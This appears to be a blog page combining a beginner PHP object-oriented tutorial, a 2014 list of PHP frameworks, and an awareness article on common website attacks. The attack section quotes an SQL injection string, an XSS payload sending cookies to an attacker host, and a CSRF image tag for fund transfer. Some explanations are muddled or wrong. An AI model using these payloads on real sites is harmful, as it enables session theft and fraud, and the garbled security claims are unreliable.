magento

Advertisements

oops

Class : 

A class is used to specify the form of an object and it combines data representation and methods for manipulating that data into one neat package. The data and functions within a class are called members of the class.

ex-> 

<?php
class Rahul {
public $name ;
private $lastname;
protected $fullname ;

function Name() // method
{
echo "Rahul";

}
}

$name = new Rahul();
$name->Name();

?>

Object :

An individual instance of the data structure defined by a class . You  defines a class once and then make many object that belongs to it . Object are also know as instance.

Example 1 ->

class Example {
public $name ;
public $item ;

function Sample(){

$this->test();
}

function Test(){

echo 'Test';
echo $this->item;
$regular = 500;
echo $regular ;
}

}

$e = new Example() ;
$e->Sample();

?>

Example  2 ->

<?php
class A
{
private $a;
function set($a)
{
$this->a=$a;
}
function disp()
{
echo $this->a."<br>";
}

};
$obj=array(new A(),new A,new A(),new A(),new A());

$data=array(10,20,30,40,50);

for($i=0;$i<count($obj);$i++)
{
$obj[$i]->set($data[$i]);
}

foreach($obj as $v)
$v->disp();

?>

Inheritance :

When a class is defined by inheriting existing function of a parent class then it is called inheritance. Here child class will inherit all or few member function and variables of a parent class.

Example ->

<?php

class Foo
{
public function printItem($string)
{
echo 'Foo: ' . $string . PHP_EOL;
}

public function printPHP()
{
echo 'PHP is great.' . PHP_EOL;
}
}

class Bar extends Foo
{
public function printItem($string)
{
echo 'Bar: ' . $string . PHP_EOL;
}
}

$foo = new Foo();
$bar = new Bar();
$foo->printItem('baz'); // Output: 'Foo: baz'
$foo->printPHP();       // Output: 'PHP is great'
$bar->printItem('baz'); // Output: 'Bar: baz'
$bar->printPHP();       // Output: 'PHP is great'

?>

Ploymorphism : 

This is a object oriented  concept where same function can be used for different purpose,

Example ->

<?php

class lineitem {
var $amount,$what;
function lineitem ($amount,$desc) {
$this->amount = $amount;
$this->what = $desc;
}

function getname () {
return $this->what;
}

function getval () {
return $this->amount;
}

}

class bill extends lineitem {
function bill ($amount,$desc) {
$this->amount = -$amount;
$this->what = $desc;
}

}

class income extends lineitem {

}

$acc[0] = new bill(15.40,"Break Rolls");
$acc[1] = new bill(17.75,"Carpet leaner");
$acc[2] = new income(37.84,"options added by Berks Folks");

$tot = 0;
$format = "%-35s ... %8.2f\n";

foreach ($acc as $item) {
$amount = $item->getval();
$whom = $item->getname();
printf($format, $whom,$amount);
$tot += $amount;
}

printf($format, "TOTAL ...",$tot);

?>

OUTPUT:

DerivedClass method called

In the above example, object $c of class DerievedClass is executed and passed to the processClass() method. The parameter accepted in processClass() is that of BassClass. Within the processClass() the method myMethod() is being called. Since the method is being called on the class variable of BaseClass, it would not be wrong to assume that myMethod() of class BaseClass will be called. But, as per the definition “When the decision to invoke a function call is made by inspecting the object at runtime it is called Polymorphism”, myMethod() will be called on object DerievedClass. The reason why this happens is because the object of DerievedClass is being passed and hence the method myMethod() of DerievedClass will be called.

function name will remain same but it make different number of arguments and can do different task.

Overloding :

Overloading is an ability of one function to perform different tasks, i.e, it allows creating several methods with the same name which differ from each other in the type of the input and the output of the function.
Overloading can be used with functions and members.

Example ->

int volume(int s),
double volume(double r,int h),
long volume(long l,int b,int h)

Depending on the parameter passed the corresponding function will be called.

Data Abstraction : 

Any representation of data in which the implementation data are hidden(abstracted) is known as data abstraction.

Example – >

<?php

abstract class Cheese
{
//can ONLY be inherited by another class
}

class Cheddar extends Cheese
{
}

$dinner = new Cheese; //fatal error
$lunch = new Cheddar; //works!

?>

Encapsulation : 

Refers To a concept where we encapsulate all the data and member function together to form object.

 

PHP Frameworks

TOP TEN BEST PHP FRAMEWORKS FOR 2014

PHP is a very powerful and well known platform. Almost 50% of the web is powered by PHP. If you are a PHP developer then you should know that framework make things simple, manageable and fun to work with. There are many PHP frameworks out there so its probably hard to chose one. In this post i have compiled a list of top ten PHP frameworks for 2014. Every framework stated here has it’s advantages and disadvantages. In this post i have briefly described about each framework and their uses. Enjoy!

Laravel

Laravel Top Ten Best PHP Frameworks For 2014

Laravel is an amazing PHP framework for web artisans. Build huge enterprise applications, or simple JSON APIs, Write powerful controllers, or slim restful routes. Laravel is perfect for jobs of all sizes.

Phalcon

phalcon Top Ten Best PHP Frameworks For 2014

Phalcon is a web framework implemented as a C extension offering high performance and lower resource consumption.

Symfony

Symfony Top Ten Best PHP Frameworks For 2014

Symfony is a PHP framework for web projects. It speed up the creation and maintenance of your PHP web applications. Replace the repetitive coding tasks by power, control and pleasure.

Code Igniter

CodeIgniter Top Ten Best PHP Frameworks For 2014

CodeIgniter is a powerful PHP framework with a very small footprint, built for PHP coders who need a simple and elegant toolkit to create full-featured web applications. CodeIgniter is a proven, agile & open PHP web application framework powering the next generation of web apps.

Yii

yii Top Ten Best PHP Frameworks For 2014

Yii is a high-performance PHP framework best for developing Web 2.0 applications. Yii comes with rich features: MVC, DAO/ActiveRecord, I18N/L10N, caching, authentication and role-based access control, scaffolding, testing, etc. It can reduce your development time significantly.

Aura

Aura Top Ten Best PHP Frameworks For 2014

If you like clean code, fully decoupled libraries, and truly independent packages, then the Aura project is for you. Download a single package and start using it in your project today, with no added dependencies. The primary goal of Aura is to provide high-quality, well-tested, standards-compliant, decoupled libraries that can be used in any codebase. This means you can use as much or as little of the project as you like.

Cake

cakePHP Top Ten Best PHP Frameworks For 2014

CakePHP makes building web applications simpler, faster and require less code.

Zend

Zend Top Ten Best PHP Frameworks For 2014

Zend Framework 2 is an open source framework for developing web applications and services using PHP 5.3+. Zend Framework 2 uses 100% object-oriented code and utilises most of the new features of PHP 5.3, namely namespaces, late static binding, lambda functions and closures.

Flight

Flight Top Ten Best PHP Frameworks For 2014

Flight is a fast, simple, extensible framework for PHP. Flight enables you to quickly and easily build restful web applications.

Kohana

Kohana Top Ten Best PHP Frameworks For 2014

An elegant HMVC PHP5 framework that provides a rich set of components for building web applications.

Hacking function

10 MOST POPULAR WAYS HACKERS HACK YOUR WEBSITE

Ways Hackers Hack Your Site

Pop quiz: what does Microsoft, Twitter, Facebook, NBC, ZenDesk, and Drupal all have in common?

They’ve all been recently hacked.

Yes, hacking is a growing threat for every business both large and small.

Whether it’s stealing private data, taking control of your computer, or shutting down your website, hackers can seriously impact any business, at any time.

Hackers can attack in so many ways, but here’s the ten most popular ways they can threaten the security of your site, and your business:

10.  INJECTION ATTACKS

Injection Attacking occurs when there are flaws in your SQL Database, SQL libraries, or even the operating system itself. Employees open seemingly credible files with hidden commands, or “injections”, unknowingly.

In doing so, they’ve allowed hackers to gain unauthorized access to private data such as social security numbers, credit card number or other financial data.

TECHNICAL INJECTION ATTACK EXAMPLE:

An Injection Attack could have this command line:

String query = “SELECT * FROM accounts WHERE custID=’” + request.getParameter(“id”) +”‘”;

The hacker modifies the ‘id’ parameter in their browser to send: ‘ or ’1′=’1. This changes the meaning of the query to return all the records from the accounts database to the hacker, instead of only the intended customers.

9.  CROSS SITE SCRIPTING ATTACKS

Cross Site Scripting, also known as an XSS attack, occurs when an application, url “get request”, or file packet is sent to the web browser window and bypassing the validation process. Once an XSS script is triggered, it’s deceptive property makes users believe that the compromised page of a specific website is legitimate.

For example, if www.example.com/abcd.html has XSS script in it, the user might see a popup window asking for their credit card info and other sensitive info.

TECHNICAL CROSS SITE SCRIPTING EXAMPLE:

A more technical example:

(String) page += “<input name=’creditcard’ type=’TEXT’ value=’” + request.getParameter(“CC”) + “‘>”;

The attacker modifies the ‘CC’ parameter in their browser to:

‘><script>document.location=’http://www.attacker.com/cgi-bin/cookie.cgi?foo=’+document.cookie</script>’

This causes the user’s session ID to be sent to the attacker’s website, allowing the hacker to hijack the user’s current session.  That means the hacker has access to the website admin credentials and can take complete control over it.  In other words, hack it.

8. BROKEN AUTHENTICATION AND SESSION MANAGEMENT ATTACKS

If the user authentication system of your website is weak, hackers can take full advantage.

Authentication systems involve passwords, key management, session IDs, and cookies that can allow a hacker to access your account from any computer (as long as they are valid).

If a hacker exploits the authentication and session management system, they can assume the user’s identity.

Scary indeed.

Ask yourself these questions to find out if your website is vulnerable to a broken authentication and session management attack:

  • Are user credentials weak (e.g. stored using hashing or encryption)?
  • Can credentials be guessed or overwritten through weak account management functions (e.g. account creation, change password, recover password, weak session IDs)?
  • Are session IDs exposed in the URL (e.g. URL rewriting)?
  • Are session IDs vulnerable to session fixation attacks?
  • Do session IDs timeout and can users log out?

If you answered “yes” to any of these questions, your site could be vulnerable to a hacker.

7. CLICKJACKING ATTACKS

Clickjacking, also called a UI Redress Attack, is when a hacker uses multiple opaque layers to trick a user into clicking the top layer without them knowing.

Thus the attacker is “hijacking” clicks that are not meant for the actual page, but for a page where the attacker wants you to be.

For example, using a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password for their bank account, but are actually typing into an invisible frame controlled by the attacker.

CLICKJACKING EXAMPLE:

Here’s a live, but safe example of how clickjacking works:

http://attacker.kotowicz.net/alphabet-hero/game.html

And here’s a video that shows how we helped Twitter defend against a Clickjacking attack:

6. DNS CACHE POISONING

DNS Cache Poisoning involves old cache data that you might think you no longer have on your computer, but is actually “toxic”.

Also known as DNS Spoofing, hackers can identify vulnerabilities in a domain name system, which allows them to divert traffic from legit servers to a fake website and/or server.

This form of attack can spread and replicate itself from one DNS server to another DNS, “poisoning” everything in it’s path.

In fact, in 2010, a DNS poisoning attack completely compromised the Great Firewall of China (GFC) temporarily and censored certain content in the United States until the problem was fixed.

5. SOCIAL ENGINEERING ATTACKS

A social engineering attack is not technically a “hack”.

It happens when you divulge private information in good faith, such as a credit card number, through common online interactions such as email, chat, social media sites, or virtually any website.

The problem, of course, is that you’re not getting into what you think you’re getting into.

A classic example of a social engineering attack is the “Microsoft tech support” scam.

This is when someone from a call center pretends to be a MS tech support member who says that your computer is slow and/or infected, and can be easily fixed – at a cost, of course.

Here’s an article from Wired.com on how a security expert played along with so-called Microsoft tech support person.

4. SYMLINKING – AN INSIDER ATTACK

A symlink is basically a special file that “points to” a hard link on a mounted file system.  A symlinking attack occurs when a hacker positions the symlink in such a way that the user or application that access the endpoint thinks they’re accessing the right file when they’re really not.

If the endpoint file is an output, the consequence of the symlink attack is that it could be modified instead of the file at the intended location. Modifications to the endpoint file could include appending, overwriting, corrupting, or even changing permissions.

In different variations of a symlinking attack a hacker may be able to control the changes to a file, grant themselves advanced access, insert false information, expose sensitive information or corrupt or destroy vital system or application files.

3. CROSS SITE REQUEST FORGERY ATTACKS

A Cross Site Request Forgery Attack happens when a user is logged into a session (or account) and a hacker uses this opportunity to send them a forged HTTP request to collect their cookie information.

In most cases, the cookie remains valid as long as the user or the attacker stays logged into the account.  This is why websites ask you to log out of your account when you’re finished – it will expire the session immediately.

In other cases, once the user’s browser session is compromised, the hacker can generate requests to the application that will not be able to differentiate between a valid user and a hacker.

A CROSS SITE ATTACK EXAMPLES

Here’s an example:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

<img src=”<span style=”color: red;”>http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#</span>” width=”0″ height=”0″ />

In this case the hacker creates a request that will transfer money from a user’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.

2. REMOTE CODE EXECUTION ATTACKS

A Remote Code Execution attack is a result of either server side or client side security weaknesses.

Vulnerable components may include libraries, remote directories on a server that haven’t been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information.

The following vulnerable components were downloaded 22 million times in 2011:

Apache CXF Authentication Bypass (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451)

By failing to provide an identity token, attackers could invoke any web service with full permission.

1. DDOS ATTACK – DISTRIBUTED DENIAL OF SERVICE ATTACK

DDoS, or Distributed Denial of Services, is where a server or a machine’s services are made unavailable to its users.

And when the system is offline, the hacker proceeds to either compromise the entire website or a specific function of a website to their own advantage.

It’s kind of like having your car stolen when you really need to get somewhere fast.

The usual agenda of a DDoS campaign is to temporarily interrupt or completely take down a successfully running system.

The most common example of a DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time.  This causes bottlenecking at the server side because the CPU just ran out of resources.

Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers.

Blog at WordPress.com.

Up ↑

%d bloggers like this: